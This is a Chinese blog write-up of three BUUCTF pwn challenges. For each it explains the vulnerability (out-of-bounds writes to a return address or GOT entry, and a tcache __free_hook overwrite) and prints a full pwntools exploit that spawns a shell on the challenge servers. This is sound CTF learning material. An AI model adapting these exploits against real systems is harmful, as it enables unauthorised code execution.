BUUCTF-PWN刷題記錄-19

原創 L.o.W 2020-05-10 16:41

目錄

wustctf2020_name_your_cat(數組越界修改返回地址)

在這裏插入圖片描述
在這裏插入圖片描述
在NameWhich函數中沒有越界檢查
在這裏插入圖片描述
我們調試看一下

0xffd31214就是char v3[40]的地址
在這裏插入圖片描述
而在0xffd3124c處就存放着函數返回地址
在這裏插入圖片描述
0xffd3124c-0xffd31214=0x38
0x38/8=7
所以我們name 7 就能修改這個返回地址了

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 26926)
#r = process("./wustctf2020_name_your_cat")

DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *0x0804866A
	b *0x0804871B
	c
	''')
context(arch = 'i386', os = 'linux', log_level = 'debug')
system = 0x080485CB

def name(num, content):
	r.recvuntil("Name for which?\n>")
	r.sendline(str(num))
	r.recvuntil("Give your name plz: ")
	r.send(content)


name(0, 'aaa\n')
name(1, 'aaa\n')
name(2, 'aaa\n')
name(3, 'aaa\n')
name(7, p32(system) + '\n')
r.interactive()

wustctf2020_name_your_dog(數組越界修改GOT表)

在這裏插入圖片描述
題目和上一題一樣,就是這次在bss段上
自然想到修改GOT表項
scanf的GOT地址爲0x0804a028
Dogs的地址是0x0804a060

差值爲0x38
0x38/8=7

from pwn import *

r = remote("node3.buuoj.cn", 28576)
#r = process("./wustctf2020_name_your_dog")

DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *0x0804866A
	b *0x0804869A
	x/10wx 0x0804a00c
	c
	''')
context(arch = 'i386', os = 'linux', log_level = 'debug')
system = 0x080485CB

def name(num, content):
	r.recvuntil("Name for which?\n>")
	r.sendline(str(num))
	r.recvuntil("Give your name plz: ")
	r.send(content)



name(-7, p32(system) + '\n')
r.interactive()

ciscn_2019_c_3(繞過不能直接修改fd的限制)

在這裏插入圖片描述
add的大小被限制爲3種,並且無法控制fd
在這裏插入圖片描述
後門函數,可以對fd進行遞增操作
在這裏插入圖片描述
指針懸掛
在這裏插入圖片描述

利用思路:

  1. 因爲我們可以申請0x110大小的chunk,釋放後能進入unsorted bin,所以我們add(0x100), add(0x60),然後刪除0 八次再show就能泄露libc
  2. 申請一個0x4f的chunk2,釋放兩次,此時chunk2的fd會指向該chunk的payload區域,我們利用後門函數把fd加0x10(idx爲2的chunk每次backdoor fd都會加一),這樣就能把__free_hook鏈到tcache上
    在這裏插入圖片描述
    在這裏插入圖片描述
  3. 之後就是熟悉的套路了,不過這題應該只能用one_gadget來獲得shell

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 27292)
#r = process("./ciscn_2019_c_3")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *$rebase(0x1298)
	x/30gx $rebase(0x202100)
	c
	''')

elf = ELF("./ciscn_2019_c_3")
libc = ELF('./libc/libc-2.27.so')
one_gadget_18 = [0x4f2c5,0x4f322,0x10a38c]

menu = "Command: \n"
def add(size, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("size: \n")
	r.sendline(str(size))
	r.recvuntil("Give me the name: \n")
	r.sendline(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("weapon:\n")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("index: \n")
	r.sendline(str(index))

def backdoor(index):
	r.recvuntil(menu)
	r.sendline('666')
	r.recvuntil("weapon:\n")
	r.sendline(str(index))

add(0x100, 'chunk0')
add(0x60, 'chunk1')
for i in range(8):
    delete(0)
show(0)
r.recvuntil("attack_times: ")
malloc_hook = int(r.recvuntil('\n').strip()) - 0x60 - 0x10
libc.address  = malloc_hook - libc.sym['__malloc_hook']
success("libc:"+hex(libc.address))
system = libc.sym['system']
free_hook = libc.sym['__free_hook']
one_gadget = one_gadget_18[1] + libc.address

payload = p64(free_hook)
add(0x4f, payload)
delete(2)
delete(2)
for i in range(0x10):
    backdoor(2)
add(0x4f, p64(free_hook-0x10))#3
add(0x4f, p64(free_hook-0x10))#4
add(0x4f, p64(one_gadget))#5
delete(1)

r.interactive()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

BUUCTF-PWN刷題記錄-5(Tcache)

目錄ciscn_2019_final_3(double free,修改size構造unsorted bin)[V&N2020 公開賽]easyTHeap(修改tcache控制結構獲得unsorted bin)hitcon_2018

L.o.W 2020-07-04 09:32:10

HITCON-Training lab5(自己構造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道簡單的格式化字符串讀漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串寫漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

棧遷移學習(buuctf [Black Watch 入羣題])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷題(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,delete功能裏存在數組下標越界,可以free掉第21個堆指針,而第21個位置對應name的空間 因此,我們可以在name裏僞造一個chunk,fr

haivk 2020-07-05 02:32:56

free_spirit(在棧上爆破一個可以被free的fake_chunk)

free_spirit(在棧上爆破一個可以被free的fake_chunk) 首先檢查一下程序的保護機制 然後,我們用IDA分析一下,功能3存在8字節溢出,將會把v7下面的buf指針覆蓋掉,而覆蓋了buf指針,就能實現任意地址寫。  

haivk 2020-07-05 02:32:56

DASCTF&BJDCTF 3rd 三道PWN題復現

最近看了一下上次安恆五月賽沒做出的幾道PWN題,感覺自己水平還是不夠,還要多學習 easybabystack(格式化字符串*, ret2csu) 這題有個棧溢出漏洞 但是必須輸入正確的密碼,否則就直接退出了 還有個格式化字符串

L.o.W 2020-07-04 09:32:10